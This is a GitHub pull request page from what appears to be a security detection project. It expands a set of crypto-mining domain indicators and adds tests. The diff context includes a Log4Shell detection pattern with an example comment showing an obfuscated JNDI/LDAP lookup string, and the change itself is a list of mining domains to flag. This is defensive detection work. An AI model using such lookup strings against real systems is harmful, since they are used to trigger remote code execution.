-
Notifications
You must be signed in to change notification settings - Fork 176
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Update CRYPTO_MINING_DOMAINS IOCs; add two additional tests #973
Conversation
CRYPTO_MINING_DOMAINS = { | ||
"monerohash.com", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I also sorted this list alphabetically.
@@ -90,77 +90,262 @@ | |||
"${::-j", # example: ${${::-j}${::-n}di:${::-l}d${::-a}p://example.com:1234/callback} | |||
} | |||
|
|||
# Sources: |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I don't know where the original entries were sourced from, but I added the references to where I was sourcing the new entries from.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Nice update!
Background
This PR expands the set of
CRYPTO_MINING_DOMAINS
with many additional domains. To ensure correct support for subdomain-based IOCs, I also added two additional tests.Changes
CRYPTO_MINING_DOMAINS
setTesting
make fmt; make lint; make test